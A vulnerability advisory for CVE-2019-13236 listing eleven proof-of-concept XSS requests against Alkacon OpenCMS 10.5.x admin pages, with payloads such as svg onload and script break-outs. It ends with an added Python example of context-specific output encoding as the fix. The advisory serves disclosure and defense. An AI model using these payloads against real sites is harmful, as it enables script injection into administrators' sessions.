Alkacon OpenCMS 10.5.x Cross Site Scripting

Date: 02 Sep 2019
Reported by: Aetsu
Type: packetstorm
Source: packetstormsecurity.com

Alkacon OpenCMS 10.5.x Cross Site Scripting in Site Management, Treeview, Workspace Tools, Index Sources, Account Management

# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms Site Management  
# Google Dork: N/A  
# Date: 18/07/2019  
# Exploit Author: Aetsu  
# Vendor Homepage: http://www.opencms.org  
# Software Link: https://github.com/alkacon/opencms-core  
# Version: 10.5.x  
# Tested on: 10.5.5 / 10.5.4  
# CVE : CVE-2019-13236  
  
1. In Site Management > New site (Stored XSS):  
- Affected resource title.0:  
POC:  
```  
POST /system/workplace/admin/sites/new.jsp HTTP/1.1  
Host: example.com  
title.0=%3Csvg+onload%3Dalert%28%27Title%27%29%3E&sitename.0=%3Csvg+onload%3Dalert%28%27Folder+name%27%29%3E&se  
```  
2. In Treeview (Reflected XSS):  
- Affected resource type:  
POC:  
```  
http://example.com/opencms/system/workplace/views/explorer/tree_fs.jsp?type=  
</script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite=  
```  
3. In Workspace tools > Login message (Stored XSS):  
- Affected resource message.0:  
POC:  
```  
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1  
Host: example.com  
enabled.0=true&enabled.0.value=true&message.0=<svg onload=alert(1)>&loginForbidden.0.value=false&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace&style=new&page=page1&framename=  
```  
4. In Index sources > View index sources > New index source (Stored XSS):  
- Affected resource name.0:  
POC:  
```  
POST /system/workplace/admin/searchindex/indexsource-new.jsp HTTP/1.1  
Host: example.com  
name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&indexerClassName.0=org.opencms.search.CmsVfsIndexer&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Findexsources%252Findexsource-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Findexsources%2526action%253Dinitial&style=new&page=page1&framename=  
```  
5. In Index sources > View field configuration > New field configuration (Stored XSS):  
- Affected resource name.0:  
POC:  
```  
POST /system/workplace/admin/searchindex/fieldconfiguration-new.jsp HTTP/1.1  
Host: example.com  
name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Ffieldconfigurations%252Ffieldconfiguration-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Ffieldconfigurations%2526action%253Dinitial&style=new&page=page1&framename=  
```  
6. In Account Management > Import/Export user data (Reflected XSS):  
- Affected resource oufqn:  
POC:  
```  
POST /system/workplace/admin/accounts/imexport_user_data/export_csv.jsp HTTP/1.1  
Host: example.com  
groups.0=Users&ok=Ok&oufqn=</script><script>confirm(1)</script>&elementname=undefined&path=%252Faccounts%252Forgunit%252Fimexport%252Fexportcsv&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Faccounts%252Forgunit%252Fimexport%2526action%253Dinitial&style=new&page=page1&framename=  
```  
7. In Account Management > Group Management > New Group (Stored XSS):  
- Affected resources name.0 and description.0:  
POC:  
```  
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1  
Host: example.com  
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27  
```  
8. In Account Management > Organizational Unit > Organizational Unit Management > New sub organizational unit (Stored XSS):  
- Affected resources parentOuDesc.0 and resources.0:  
POC:  
```  
POST /system/workplace/admin/accounts/unit_new.jsp HTTP/1.1  
Host: example.com  
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27D  
```  
9. In Link Validator > External Link Validator > Validate External Links (Reflected XSS):  
- Affected resources reporttype, reportcontinuekey and title:  
POC:  
```  
POST /system/workplace/views/admin/admin-main.jsp?path=%2Flinkvalidation%2Fexternal%2Fvalidateexternallinks HTTP/1.1  
Host: example.com  
dialogtype=imp&reporttype=extended66955%22%3balert(1)%2f%2f297&reportcontinuekey=&title=External%2BLink%2BValidation&path=%252Flinkvalidation%252Fexternal%252Fvalidateexternallinks&threadhasnext=&action=confirmed&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Flinkvalidation%252Fexternal&style=new&framename=&ok=OK  
```  
10. In Administrator view > Database management > Extended html import > Default html values (Reflected XSS):  
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0, downloadGallery.0:  
POC:  
```  
POST /system/workplace/admin/database/htmlimport/htmldefault.jsp HTTP/1.1  
Host: example.com  
------WebKitFormBoundaryLyJOmAtrd8ArxNqf  
Content-Disposition: form-data; name="inputDir.0"  
.  
------WebKitFormBoundaryLyJOmAtrd8ArxNqf  
Content-Disposition: form-data; name="destinationDir.0"  
/whbo0"><script>alert(1)</script>nrbhd  
------WebKitFormBoundaryLyJOmAtrd8ArxNqf  
Content-Disposition: form-data; name="imageGallery.0"  
------WebKitFormBoundaryLyJOmAtrd8ArxNqf  
Content-Disposition: form-data; name="downloadGallery.0"  
------WebKitFormBoundaryLyJOmAtrd8ArxNqf  
Content-Disposition: form-data; name="linkGallery.0"  
[...]  
```  
11. In Administrator view > Database management > Extended html import > Default html values (Reflected XSS):  
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0 and downloadGallery.0:  
POC:  
```  
POST /system/workplace/admin/database/htmlimport/htmlimport.jsp HTTP/1.1  
Host: example.com  
------WebKitFormBoundary6fy3ENawtXT0qmgB  
Content-Disposition: form-data; name="inputDir.0"  
gato  
------WebKitFormBoundary6fy3ENawtXT0qmgB  
Content-Disposition: form-data; name="destinationDir.0"  
testszfgw"><script>alert(1)</script>vqln7  
------WebKitFormBoundary6fy3ENawtXT0qmgB  
Content-Disposition: form-data; name="imageGallery.0"  
test  
------WebKitFormBoundary6fy3ENawtXT0qmgB  
Content-Disposition: form-data; name="downloadGallery.0"  
test  
------WebKitFormBoundary6fy3ENawtXT0qmgB  
Content-Disposition: form-data; name="linkGallery.0"  
test  
[...]  
```  
  
  
Extended POCs: https://aetsu.github.io/OpenCms  
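The PoCs above land in two distinct output contexts: HTML body (the `<svg onload>` and `<img onerror>` values in #1, #3, #4, #5, #7, #8) and an inline script (the `</script><script>` values in #2 and #6, and the `";alert(1)//` string break-out in #9). The fix on the rendering side is context-specific output encoding, which the following added example illustrates; it is not code from the advisory or from OpenCms, and the two `render_*` templates are hypothetical stand-ins for the workplace JSPs. The sample inputs are the decoded form of values taken from the PoCs.

```python
import html
import json

# Constructed sample inputs: decoded values from the advisory's PoC requests
# (title.0 from #1, type from #2, reporttype from #9).
SAMPLE_TITLE = "<svg onload=alert('Title')>"
SAMPLE_TREE_TYPE = "</script><script>confirm(1)</script>"
SAMPLE_REPORTTYPE = 'extended66955";alert(1)//297'


def encode_html_text(value: str) -> str:
    """Encoder for an HTML element or quoted-attribute context: < > & " ' become entities."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """Encoder for a value embedded as a string literal inside an inline <script>.

    json.dumps yields a double-quoted literal with quotes and backslashes escaped,
    which defeats the '";alert(1)//' break-out. Escaping '<' and '/' on top of that
    keeps a value containing '</script>' from terminating the enclosing script element.
    """
    return json.dumps(value).replace("<", "\\u003c").replace("/", "\\/")


def render_site_title(title: str) -> str:
    """Hardened HTML rendering of a site title (hypothetical template, not OpenCms code)."""
    return f'<span class="sitetitle">{encode_html_text(title)}</span>'


def render_report_script(reporttype: str) -> str:
    """Hardened inline-script rendering of reporttype (hypothetical template, not OpenCms code)."""
    return f"<script>var reportType = {encode_js_string(reporttype)};</script>"


def script_block_intact(fragment: str) -> bool:
    """True when the rendered fragment still contains exactly one <script> open and one close."""
    low = fragment.lower()
    return low.count("<script") == 1 and low.count("</script") == 1


if __name__ == "__main__":
    print(render_site_title(SAMPLE_TITLE))
    print(render_report_script(SAMPLE_REPORTTYPE))
    rendered = render_report_script(SAMPLE_TREE_TYPE)
    print(rendered, script_block_intact(rendered))
```

Note that `encode_html_text` alone would not protect the inline-script contexts (#2, #6, #9): an entity-encoded value inside a JavaScript string is simply wrong data, and a quote in the raw value still ends the literal, so each context needs its own encoder.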
